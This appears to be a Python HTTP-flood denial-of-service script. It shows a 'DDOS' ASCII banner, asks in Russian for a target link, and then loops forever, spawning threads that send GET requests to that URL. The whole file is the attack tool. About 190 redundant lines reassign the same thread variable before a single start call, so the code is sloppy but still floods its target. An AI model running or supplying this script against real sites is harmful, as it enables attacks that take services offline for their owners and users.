import colorama
import threading
import requests
from colorama import Fore

Blue = Fore.BLUE 
Reset = Fore.RESET 

print(f"""{Blue}

 .S_sSSs     .S_sSSs      sSSs_sSSs      sSSs  
.SS~YS%%b   .SS~YS%%b    d%%SP~YS%%b    d%%SP  
S%S   `S%b  S%S   `S%b  d%S'     `S%b  d%S'    
S%S    S%S  S%S    S%S  S%S       S%S  S%|     
S%S    S&S  S%S    S&S  S&S       S&S  S&S     
S&S    S&S  S&S    S&S  S&S       S&S  Y&Ss    
S&S    S&S  S&S    S&S  S&S       S&S  `S&&S   
S&S    S&S  S&S    S&S  S&S       S&S    `S*S  
S*S    d*S  S*S    d*S  S*b       d*S     l*S  
S*S   .S*S  S*S   .S*S  S*S.     .S*S    .S*P  
S*S_sdSSS   S*S_sdSSS    SSSbs_sdSSS   sSS*S   
SSS~YSSY    SSS~YSSY      YSSP~YSSY    YSS'    
                                               
{Reset}""")

def make_request(url):
    response = requests.get(url)
    print(response.status_code)
    
url = input(f"{Blue}[+]Вставьте ссылку{Reset}")

while True:
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    t = threading.Thread(target=make_request, args=(url,))
    
    t.start()